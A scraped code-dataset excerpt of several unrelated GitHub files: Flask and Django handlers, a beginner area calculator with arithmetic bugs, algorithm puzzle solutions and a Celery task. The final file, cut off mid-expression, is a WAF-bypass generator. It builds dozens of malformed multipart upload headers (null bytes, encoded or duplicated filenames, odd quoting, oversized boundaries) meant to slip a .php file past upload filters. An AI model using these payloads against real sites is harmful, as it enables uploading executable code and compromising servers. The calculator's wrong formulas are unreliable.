shows=data)\n\n\n@show_blueprint.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n\n venues = Venue.query.all()\n artists = Artist.query.all()\n\n form.artist_id.choices = []\n form.venue_id.choices = []\n\n for venue in venues:\n form.venue_id.choices.append((venue.id, venue.name))\n\n for artist in artists:\n form.artist_id.choices.append((artist.id, artist.name))\n\n return render_template('forms/new_show.html', form=form)\n\n\n@show_blueprint.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # called to create new shows in the db, upon submitting new show listing\n # form\n try:\n form = ShowForm()\n\n venue_id = form.venue_id.data\n artist_id = form.artist_id.data\n start_time = form.start_time.data\n\n show = Show(\n venue_id=venue_id,\n artist_id=artist_id,\n start_time=start_time)\n\n db.session.add(show)\n db.session.commit()\n # on successful db insert, flash success\n flash('Show was successfully listed!')\n except BaseException:\n # e.g., flash('An error occurred. Show could not be listed.')\n # see: http://flask.pocoo.org/docs/1.0/patterns/flashing/\n db.session.rollback()\n flash('An error occured Show was not successfully listed!')\n print(sys.exc_info())\n finally:\n db.session.close()\n\n return redirect(\n url_for('index'))\n","repo_name":"see-why/FyyerApp","sub_path":"show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4732513145","text":"#AreaCalculator\r\nimport math\r\ndef Area_Triangle():\r\n b,h=input(\"Enter Base & Height: \").split()\r\n print(\"Area Of The Triangle: \",0.5*int(b)*int(h))\r\n\r\ndef Area_Rectangle():\r\n w,h=input(\"Enter Width & Height: \").split()\r\n print(\"Area Of The Rectangle: \",0.5*int(w)*int(h))\r\n\r\ndef Area_Trapezium():\r\n a,b,h=input(\"Enter length of a,b & height: \").split()\r\n print(\"Area Of The Trapezium: \",0.5*(int(a)+int(b))*int(h))\r\n\r\ndef Area_Circle():\r\n r = input(\"Enter radius: \")\r\n print(\"Area Of The Circle: \",math.pi*float(r)*float(r))\r\n\r\ndef Area_Ellipse():\r\n b,h=input(\"Enter a & b: \").split()\r\n print(\"Area Of The Ellipse: \",math.pi*int(b)*int(h))\r\n\r\ndef Area_Square():\r\n a=input(\"Enter Length of side: \")\r\n print(\"Area Of The Triangle: \",int(a)(int(a)))\r\n\r\ndef Area_Parallelogram():\r\n b,h=input(\"Enter Base & Vertical Height: \").split()\r\n print(\"Area Of The Triangle: \",int(b)*int(h))\r\n\r\ndef Area_Sector():\r\n r,a=input(\"Enter radius and angle in radians: \").split()\r\n print(\"Area Of The Triangle: \",0.5*int(r)*int(r)*int(a))\r\n\r\nif __name__ == '__main__':\r\n\r\n print(\"Area Calculator\")\r\n print(\"---------------\")\r\n print(\"1.Triangle\\n2.Rectangle\\n3.Trapezium\\n4.Circle\\n5.Ellipse\\n6.Square\\n7.Parallelogram\\n8.Sector\\n0 to exit\")\r\n print(\"Please Enter A Number To Calculate Area:\")\r\n n = int(input())\r\n if n == 1:\r\n Area_Triangle()\r\n elif n == 2:\r\n Area_Rectangle()\r\n elif n == 3:\r\n Area_Trapezium()\r\n elif n == 4:\r\n Area_Circle()\r\n elif n == 5:\r\n Area_Ellipse()\r\n elif n == 6:\r\n Area_Square()\r\n elif n == 7:\r\n Area_Parallelogram()\r\n elif n == 8:\r\n Area_Sector()\r\n elif n == 0:exit\r\n","repo_name":"SihabSahariar/BRACU-CSE","sub_path":"CSE111-Python/CSE111-Python-master/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"38065379207","text":"import sys\nsys.setrecursionlimit(10**9)\ninput = sys.stdin.readline\nt = int(input())\n\ndef solve():\n def find(x):\n if x == parent[x]:\n return x\n parent[x] = find(parent[x])\n return parent[x]\n \n \n def union(x, y):\n x = find(x)\n y = find(y)\n if x != y:\n parent[x] = y\n num[y] += num[x]\n num[x] = 1\n return num[y]\n \n \n res = []\n for _ in range(t):\n f = int(input())\n cnt = 1\n parent = [i for i in range(f*2+1)]\n num = [1]*(f*2+1)\n freind = dict()\n for _ in range(f):\n a, b = input().split()\n if a not in freind:\n freind[a] = cnt\n cnt += 1\n if b not in freind:\n freind[b] = cnt\n cnt += 1\n res.append(union(freind[a], freind[b]))\n print('\\n'.join(map(str,res)))\n\nif __name__=='__main__':\n solve()","repo_name":"shg9411/algo","sub_path":"algo_py/boj/bj4195.py","file_name":"bj4195.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"14285225073","text":"import json\nimport time\nfrom channels.generic.websocket import AsyncWebsocketConsumer\nfrom asgiref.sync import sync_to_async\n#from users.models import userModel\nfrom .models import Message\n\n\nclass chatConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.room_name = self.scope['url_route']['kwargs'].get(\n 'room_name', '0')\n self.room_group_name = f'chat_{self.room_name}'\n # join room group\n await self.channel_layer.group_add(self.room_group_name,\n self.channel_name)\n\n await self.accept()\n\n async def disconnect(self, close_mode):\n # leave room group\n await self.channel_layer.group_discard(self.room_group_name,\n self.channel_name)\n\n async def receive(self, text_data):\n \"\"\"receive message from websocket\"\"\"\n text_data_json = json.loads(text_data)\n message = text_data_json['message']\n await self.save_message(self.room_name, message)\n # send message to the group\n await self.channel_layer.group_send(\n self.room_group_name, {\n 'type': 'chat_message',\n 'message': message,\n 'sender': self.scope['user'].username,\n })\n\n async def chat_message(self, event):\n \"\"\"receive messsage from room group\"\"\"\n message = event['message']\n sender = event['sender']\n # send message to websocket\n await self.send(text_data=json.dumps(\n {\n 'message': message,\n 'sender': sender,\n 'sendtime': time.strftime('%Y-%m-%d %H:%M:%S',\n time.localtime()),\n }))\n\n @sync_to_async\n def save_message(self, room, content):\n user = self.scope['user']\n\n Message.objects.create(sender=user.username,\n room=room,\n message=content)\n","repo_name":"herschel-ma/BlogApp","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23385834009","text":"# https://adventofcode.com/2022/day/2\n\nfrom enum import Enum\n\n\nEXAMPLE_INPUT = \"\"\"\\\nA Y\nB X\nC Z\n\"\"\"\n\n\n# === Part 1 ===\n\n\nclass Shape(Enum):\n ROCK = 1\n PAPER = 2\n SCISSORS = 3\n\n\nclass Outcome(Enum):\n LOSE = 0\n DRAW = 3\n WIN = 6\n\n\ndef test_part1():\n assert part1(EXAMPLE_INPUT) == 15\n\n\ndef part1(text):\n return sum(line_score_part1(line) for line in text.splitlines())\n\n\nTHEIR_SHAPES = {\n \"A\": Shape.ROCK,\n \"B\": Shape.PAPER,\n \"C\": Shape.SCISSORS,\n}\n\nMY_SHAPES = {\n \"X\": Shape.ROCK,\n \"Y\": Shape.PAPER,\n \"Z\": Shape.SCISSORS,\n}\n\nBEATS = {\n Shape.ROCK: Shape.SCISSORS,\n Shape.SCISSORS: Shape.PAPER,\n Shape.PAPER: Shape.ROCK,\n}\n\nLOSES_TO = {value: key for key, value in BEATS.items()}\n\n\ndef line_score_part1(line):\n their_move, my_move = line.split()\n return round_score(THEIR_SHAPES[their_move], MY_SHAPES[my_move])\n\n\ndef round_score(their_shape, my_shape):\n return my_shape.value + outcome(my_shape, their_shape).value\n\n\ndef outcome(my_shape, their_shape):\n if BEATS[my_shape] == their_shape:\n return Outcome.WIN\n if BEATS[their_shape] == my_shape:\n return Outcome.LOSE\n return Outcome.DRAW\n\n\n# === Part 2 ===\n\n\ndef test_part2():\n assert part2(EXAMPLE_INPUT) == 12\n\n\ndef part2(text):\n return sum(line_score_part2(line) for line in text.splitlines())\n\n\ndef line_score_part2(line):\n their_move, desired_outcome = line.split()\n their_shape = THEIR_SHAPES[their_move]\n my_shape = shape_to_play(their_shape, desired_outcome)\n return round_score(their_shape, my_shape)\n\n\ndef shape_to_play(their_shape, desired_outcome):\n if desired_outcome == \"X\": # lose\n return BEATS[their_shape]\n if desired_outcome == \"Y\": # draw\n return their_shape\n if desired_outcome == \"Z\": # win\n return LOSES_TO[their_shape]\n\n\ndef read_puzzle_input():\n with open(__file__.removesuffix(\"py\") + \"txt\") as f:\n return f.read()\n\n\nif __name__ == \"__main__\":\n text = read_puzzle_input()\n print(\"Part 1:\", part1(text))\n print(\"Part 2:\", part2(text))\n","repo_name":"ronnix/jeux-de-programmation","sub_path":"07-advent-of-code-2022/day-02.py","file_name":"day-02.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"15536685703","text":"from .models import Edge, Bike\nfrom celery import shared_task\nfrom channels.layers import get_channel_layer\nfrom asgiref.sync import async_to_sync\nfrom .utils import Red\nfrom django.core.exceptions import ObjectDoesNotExist\n\nimport json\nfrom decimal import Decimal\n\ndef default(obj):\n if isinstance(obj, Decimal):\n return str(obj)\n raise TypeError(\"Object of type '%s' is not JSON serializable\" % type(obj).__name__)\n\nchannel_layer = get_channel_layer()\n\n\n@shared_task\ndef send_location():\n data = []\n for item in Red.getAllKey():\n if item.isnumeric():\n edge = Red.get(item)\n edge = json.loads(edge)\n edge['id'] = item\n rent = Red.get('rented')\n if rent is None:\n edge['mode'] = False\n else:\n rent = json.loads(rent)\n print(rent, type(rent))\n if item in rent:\n edge['mode'] = rent[item]\n else:\n edge['mode'] = False\n # edge['mode'] = rent[item]\n data.append(edge)\n data = json.dumps(data, default=default)\n\n async_to_sync(channel_layer.group_send)('client', {'type': 'send_new_data', 'text': data })\n\n@shared_task\ndef replicate_redis():\n for item in Red.getAllKey():\n if item.isnumeric():\n try:\n edge = Edge.objects.get(id=int(item))\n data = Red.get(item)\n data = json.loads(data)\n bike = Bike(edge=edge,latitude=float(data[\"latitude\"]), longtitude = float(data[\"longtitude\"]))\n bike.save()\n except ObjectDoesNotExist:\n print(\"edge not exist\")\n\n","repo_name":"dongsinhho/bikeManagerServer","sub_path":"bikeManager/api/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33532333779","text":"import base64, pyperclip\r\n\r\n##https://github.com/maybe-why-not/upload_waf_filename_bypass\r\n##################################################################################################\r\n##Content-Type: multipart/form-data; boundary=------------------------42cef8877054958f\r\n##\r\n##--------------------------42cef8877054958f\r\n##Content-Disposition: form-data; name=\"file\"; filename=\"xx.php\"\r\n##Content-Type: application/png\r\n##\r\n##123456\r\n##--------------------------42cef8877054958f\r\n##################################################################################################\r\nsuffix = b'php'\r\nfilename = b'xx'\r\nname = b'upfile'\r\nboundary = b'------------------------f4c3abc7d7d6bcd9'\r\nContent_Type = b'image/jpeg'\r\ncontent = b'123456'\r\n##################################################################################################\r\ndef generate(Content_Type1 = b'''Content-Type: multipart/form-data; boundary=''' + boundary,\\\r\n boundary1 = b'''--''' + boundary,\\\r\n Content_Disposition = b'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\n Content_Type2 = b'''Content-Type: ''' + Content_Type,\\\r\n body = content,\\\r\n boundary2 = b'''--''' + boundary,\\\r\n ):\r\n \r\n body = Content_Type1 + b'''\\r\r\n\\r\r\n''' + boundary1 + b'''\\r\r\n''' + Content_Disposition + b'''\\r\r\n''' + Content_Type2 + b'''\\r\r\n\\r\r\n''' + body + b'''\\r\r\n''' + boundary2\r\n\r\n return base64.b64encode(body)\r\n\r\ndef generate_other(body = b''):\r\n \r\n return base64.b64encode(body)\r\n\r\ndef utf8_encode(string):\r\n return(b\"=?utf-8?B?\"+ base64.b64encode(string) +b\"?=\")\r\n\r\ndef gbk_encode(string):\r\n res = \"\"\r\n for i in string.decode(\"gbk\"):\r\n tmp = hex(ord(i)).split(\"0x\")[1]\r\n res += f\"={tmp}\"\r\n return (\"=?gbk?Q?\"+res+\"?=\").encode('utf8')\r\n##################################################################################################\r\npayloads = []\r\nContent_Disposition_list = [b'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix[:1] + b'''\\r\\n''' + suffix[1:] + b'''\"''',\r\nb'''\\tContent-Disposition: form-data; name=\"''' + name + b'''\"\\r\\r\\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition\\t: form-data; name=\"''' + name + b'''\"\\r\\r\\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\\x00\"\\r\\r\\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; \\x1cfilename\\x1c=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + utf8_encode(name) + b'''\"; filename=\"''' + utf8_encode(filename + b'''.''' + suffix) + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + gbk_encode(name) + b'''\"; filename=\"''' + gbk_encode(filename + b'''.''' + suffix) + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\\'''' + name + b'''; filename=\\'''' + filename + b'''.''' + suffix + b'''; name=\\'''' + name + b'''\\'''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\\\\\"; filename=\"''' + filename + b'''.''' + suffix + b'''; name=\"''' + name + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"a\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=''' + filename + b''''.''' + suffix,\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=\"''' + filename + b''''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=''' + filename + b'''\".''' + suffix,\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=''' + filename + b''':.''' + suffix,\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''\".''' + suffix + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=''' + name + b'''; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=''' + name + b'''; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=''' + name + b'''; filename=''' + filename + b'''.''' + suffix,\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=''' + filename + b'''.''' + suffix,\r\nb'''Content-Disposition: form-data; name=\\'''' + name + b''''; filename=\\'''' + filename + b'''.''' + suffix + b'''\\'''',\r\nb'''Content-Disposition: 'form-data'; name=\"''' + name + b'''\"; filename=\\'''' + filename + b'''.''' + suffix + b'''\\'''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix,\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\\'''' + filename + b'''.''' + suffix,\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b''';''',\r\nb'''Content-Disposition: form-data; Name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''content-disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=[0x09]\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=[0x09]\"''' + filename + b'''.''' + suffix,\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=[0x09]\"''' + filename + b'''.''' + suffix + b'''\"[0x09]''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=[0x09]''' + filename + b'''.''' + suffix,\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=[0x09]''' + filename + b'''.''' + suffix + b'''[0x09];''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\";;; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name==\"''' + name + b'''\"; filename====\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename===''' + filename + b'''.''' + suffix,\r\nb'''Content-Disposition: fOrM-DaTA; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-da+ta; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: fo r m-dat a; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-datax; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; filename=\"''' + filename + b'''.''' + suffix + b'''\"; name=\"''' + name + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.jpg\" filename=\"''' + filename + b'''.jpg\"; filename=\"''' + filename + b'''.jpg\"; filename=\"''' + filename + b'''.jpg\"; filename=\"''' + filename + b'''.jpg\"; filename=\"''' + filename + b'''.jpg\"; filename=\"''' + filename + b'''.''' + suffix + b'''\";''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; fbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf; \\r\\nfilename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.jpg;.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.jpg'.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.jpg\".''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.jpg\\\\.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''[0x00].jpg\"''',\r\nb'''Content-Disposition:form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: *; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: ~form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b''' .jpg\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''_.jpg\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''..''' + suffix + b'''.jpg.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\\x00.jpg\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=;filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data+; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename*=\"UTF8\\'''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data ; name=\"''' + name + b'''\" ; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name= \"''' + name + b'''\"; filename= \"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"test\"; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',]\r\n##################################################################################################\r\nContent_Type1_list = [b'''Content-Type: multipart/form-data; boundary=--''' + boundary,\r\nb'''Content-Type: mUltiPart/ForM-dATa; boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data x boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data a\\\\|/?!@#$%^() boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data,boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data,x,boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data,a\\\\|/?!@#$%^(),boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data;bypass&123**{|}boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data bypass&123**{|}boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data,bypass&123**{|}boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data; boundary=--''' + boundary + b''';123abc''',\r\nb'''Content-Type: multipart/form-data; boundary=--''' + boundary + b''',123abc''',\r\nb'''Content-Type: multipart/form-data; boundary =--''' + boundary,\r\nb'''Content-Type: multipart/form-data ; boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data; bOundary=--''' + boundary,]\r\n##################################################################################################\r\nContent_Type2_list = [b'''content-type: ''' + Content_Type,\r\nb'''Content-Type: ''' + Content_Type,]\r\n##################################################################################################\r\nother_list = [b'''Content-Type: multipart/form-data; boundary=''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.jpg\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data; boundary=''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\n--''' + boundary + b'''--\\r\r\n--''' + boundary + b''';123\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data; boundary=--''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; fbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf; \\r\r\nfilename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data; boundary=--''' + boundary + b'''fbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9\\r\r\n\\r\r\n--''' + boundary + b'''fbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\";filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary + b'''fbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9''',#\r\nb'''Content-Type: multipart/form-data; boundary=--''' + boundary + b''',bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + 